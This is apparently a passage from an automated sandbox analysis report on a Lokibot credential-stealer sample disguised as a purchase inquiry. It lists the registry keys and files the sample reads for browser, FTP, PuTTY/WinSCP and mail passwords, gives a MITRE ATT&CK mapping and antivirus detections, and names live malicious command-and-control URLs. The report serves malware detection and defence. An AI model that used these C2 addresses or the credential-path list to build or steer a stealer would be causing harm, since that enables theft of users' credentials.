                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Lokibot
                  Source: Yara matchFile source: 2.2.Purchase Inquiry_#466789.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Purchase Inquiry_#466789.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Purchase Inquiry_#466789.exe.3f60a40.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Purchase Inquiry_#466789.exe.3f7aa60.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1674708202.0000000003F7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1674289930.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1674708202.0000000003EFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Purchase Inquiry_#466789.exe PID: 1880, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Purchase Inquiry_#466789.exe PID: 7244, type: MEMORYSTR
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000002.00000002.2909018268.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                  Tries to steal Mail credentials (via file registry)
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeCode function: PopPassword2_2_0040D069
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeCode function: SmtpPassword2_2_0040D069
                  Source: Yara matchFile source: 2.2.Purchase Inquiry_#466789.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Purchase Inquiry_#466789.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Purchase Inquiry_#466789.exe.3f60a40.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Purchase Inquiry_#466789.exe.3f7aa60.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1674708202.0000000003F7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1674289930.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1674708202.0000000003EFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                  DLL Side-Loading                  		1
                  Access Token Manipulation                  		1
                  Masquerading                  		2
                  OS Credential Dumping                  		11
                  Security Software Discovery                  		Remote Services1
                  Email Collection                  		1
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
                  Process Injection                  		1
                  Disable or Modify Tools                  		2
                  Credentials in Registry                  		31
                  Virtualization/Sandbox Evasion                  		Remote Desktop Protocol1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading                  		31
                  Virtualization/Sandbox Evasion                  		Security Account Manager1
                  File and Directory Discovery                  		SMB/Windows Admin Shares2
                  Data from Local System                  		1
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Access Token Manipulation                  		NTDS13
                  System Information Discovery                  		Distributed Component Object ModelInput Capture111
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                  Process Injection                  		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Deobfuscate/Decode Files or Information                  		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
                  Obfuscated Files or Information                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                  Software Packing                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  DLL Side-Loading                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Purchase Inquiry_#466789.exe71%ReversingLabsWin32.Trojan.Leonem
                  Purchase Inquiry_#466789.exe43%VirustotalBrowse
                  Purchase Inquiry_#466789.exe100%AviraTR/AVI.LokiBot.bnwoa
                  Purchase Inquiry_#466789.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
                  http://www.fontbureau.com0%URL Reputationsafe
                  http://www.fontbureau.com/designersG0%URL Reputationsafe
                  http://kbfvzoboss.bid/alien/fre.php100%URL Reputationmalware
                  http://www.fontbureau.com/designers/?0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://alphastand.top/alien/fre.php100%URL Reputationmalware
                  http://alphastand.top/alien/fre.php100%URL Reputationmalware
                  http://www.fontbureau.com/designers?0%URL Reputationsafe
                  http://www.ibsensoftware.com/0%URL Reputationsafe
                  https://api.w.org/0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.fontbureau.com/designers0%URL Reputationsafe
                  http://alphastand.win/alien/fre.php100%URL Reputationmalware
                  https://gmpg.org/xfn/110%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://alphastand.trade/alien/fre.php100%URL Reputationmalware
                  http://alphastand.trade/alien/fre.php100%URL Reputationmalware
                  https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.fontbureau.com/designers80%URL Reputationsafe
                  http://www.fonts.com0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
